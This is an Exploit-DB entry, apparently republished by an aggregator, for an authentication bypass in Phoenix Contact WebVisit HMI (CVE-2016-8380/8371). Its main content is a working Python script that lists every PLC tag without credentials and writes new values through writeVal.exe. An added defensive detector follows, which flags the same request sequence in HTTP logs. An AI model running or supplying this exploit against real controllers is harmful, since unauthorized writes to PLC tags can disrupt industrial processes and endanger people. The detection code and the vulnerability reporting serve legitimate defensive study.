
Phoenix Contact WebVisit 2985725 - Authentication Bypass

Published: 12 Oct 2018 | Reported by: Photubias | Type: exploitdb | Source: www.exploit-db.com

Script for reading and writing PLC tags via a WebVisit HMI page, with a potential authentication bypass vulnerability.

# Exploit Title: Phoenix Contact WebVisit 2985725 - Authentication Bypass
# Date: 2018-09-30
# Exploit Author: Deneut Tijl
# Vendor Homepage: www.phoenixcontact.com
# Software Link: https://www.phoenixcontact.com/online/portal/nl/?uri=pxc-oc-itemdetail:pid=2985725&library=nlnl&pcck=P-19-05-01&tab=5
# Version: WebVisit (all versions)
# CVE : CVE-2016-8380, CVE-2016-8371

# Description
# Script to read and write PLC tags via a Webvisit HMI page (even in case of a password protection)
# Steps:
# * Get Project Name: http://<ip>/
# * Get list of tags: http://<ip>/<projectname>.tcr
# * Get current values of tags: http://<ip>/cgi-bin/ILRReadValues.exe
# * Set new tag values: http://<ip>/cgi-bin/writeVal.exe?<tag>+<value> (urlencode!)

# CVE-2016-8380-SetPLCValues.py

#! /usr/bin/env python

import urllib2

strIP = raw_input('Please enter an IP [192.168.1.200]: ')
if strIP == '': strIP = '192.168.1.200'

try:
    URLResponse = urllib2.urlopen(urllib2.Request('http://' + strIP + '/'))
except urllib2.URLError:  # URLError also covers HTTPError, so an unreachable host is reported too
    print('#### Critical Error with IP ' + strIP + ': no response')
    raw_input('Press Enter to exit')
    exit()

strProject = ''
for line in URLResponse.readlines():
    if 'ProjectName' in line:
        strProject = line.split('VALUE="')[1].split('"')[0]

if strProject == '':
    print('#### Error, no \'ProjectName\' found on the main page')
    raw_input('Press Enter to exit')
    exit()

print('---- Found project \'' + strProject + '\', retrieving list of tags')

try:
    TagResponse = urllib2.urlopen(urllib2.Request('http://' + strIP + '/' + strProject + '.tcr'))
except urllib2.HTTPError:
    print('#### Critical Error with IP ' + strIP + ': /' + strProject + '.tcr not found')
    raw_input('Press Enter to exit')
    exit()

arrTagList = []
for line in TagResponse.readlines():
    if line.startswith('#!-- N ='):
        intNumberOfTags = int(line.split('=')[1])
        print('---- There should be ' + str(intNumberOfTags) + ' tags:')
    if not line.startswith('#'):
        if not line.split(';')[0].strip() == '':
            arrTagList.append(line.split(';')[0].strip())
            print('-- '+line.split(';')[0].strip())


raw_input('Press Enter to query them all')
import os, urllib
os.system('cls' if os.name == 'nt' else 'clear')
strPost = '<body>'
strPost += '<item_list_size>' + str(len(arrTagList)) + '</item_list_size>'
strPost += '<item_list>'
for item in arrTagList:
    strPost += '<i><n>' + item + '</n></i>'
strPost += '</item_list></body>'
DataResponse = urllib2.urlopen(urllib2.Request('http://' + strIP + '/cgi-bin/ILRReadValues.exe', strPost)).read()

arrData = []
for item in DataResponse.split('<i>'):
    if '<n>' in item:
        name = item.split('<n>')[1].split('</n>')[0]
        value = item.split('<v>')[1].split('</v>')[0]
        arrData.append((name,value))
print('----- Full list of tags and their values:')
i = 0
for item in arrData:
    i += 1
    print(str(i) + ': Tag ' + item[0] + ' has value: ' + item[1])

ans1 = raw_input('Want to change a tag? Enter a number or press Enter to quit: ')
if ans1 == '':
    exit()
strTag = arrData[int(ans1) - 1][0]
strVal = arrData[int(ans1) - 1][1]
ans2 = raw_input('Setting value for ' + strTag + ' [' + strVal + ']: ')
if ans2 == '': ans2 = strVal
urllib2.urlopen(urllib2.Request('http://' + strIP + '/cgi-bin/writeVal.exe?' + urllib.quote_plus(strTag) + '+' + str(ans2)))
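
For defenders, the request sequence the script performs (tag list from `<projectname>.tcr`, read via `ILRReadValues.exe`, write via `writeVal.exe?<tag>+<value>`) can be looked for in HTTP logs. The following is an added example, not part of the original script or of any vendor tooling; it is Python 3, and it assumes Common Log Format lines from a proxy or network sensor in front of the PLC, a hypothetical allow-list of HMI stations, and constructed sample lines and tag names.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus, urlsplit

# Assumption: engineering/HMI stations that are expected to talk to the PLC.
ALLOWED_CLIENTS = {"192.168.1.10"}

# Common Log Format: client, time, method, request target, status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
STEPS = {"/cgi-bin/ilrreadvalues.exe": "read", "/cgi-bin/writeval.exe": "write"}

def classify(path):
    """Map a request path to the WebVisit step it corresponds to, or None."""
    p = path.lower()  # compared case-insensitively as a conservative choice
    return "tag_list" if p.endswith(".tcr") else STEPS.get(p)

def scan(lines, allowed=ALLOWED_CLIENTS):
    """Return one alert per tag write from a client outside `allowed`."""
    seen = defaultdict(list)  # client -> WebVisit steps observed so far
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, when, method, target, status = m.groups()
        url = urlsplit(target)
        step = classify(url.path)
        if step is None or client in allowed:
            continue
        seen[client].append(step)
        if step == "write":
            # Query is <tag>+<value>; the value follows the last '+'.
            tag, _, value = url.query.rpartition("+")
            alerts.append({
                "client": client, "time": when, "status": int(status),
                "tag": unquote_plus(tag), "value": unquote_plus(value),
                "enumerated_first": "tag_list" in seen[client][:-1],
            })
    return alerts

# Constructed sample log lines (not captured from a real device).
SAMPLE = [
    '192.168.1.10 - - [12/Oct/2018:09:00:00 +0000] "POST /cgi-bin/ILRReadValues.exe HTTP/1.1" 200 310',
    '192.168.1.77 - - [12/Oct/2018:09:05:02 +0000] "GET /Plant.tcr HTTP/1.1" 200 2048',
    '192.168.1.77 - - [12/Oct/2018:09:05:03 +0000] "POST /cgi-bin/ILRReadValues.exe HTTP/1.1" 200 310',
    '192.168.1.77 - - [12/Oct/2018:09:05:09 +0000] "GET /cgi-bin/writeVal.exe?Pump%5FEnable+0 HTTP/1.1" 200 12',
]

if __name__ == "__main__":
    for alert in scan(SAMPLE):
        print(alert)
```

An alert with `enumerated_first` set matches the full sequence in the script; a write on its own from an unlisted client is still worth triage.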

Vulners AI Score: 7.4 (High risk)
CVSS 3: 7.3
CVSS 2: 7.5
EPSS: 0.12534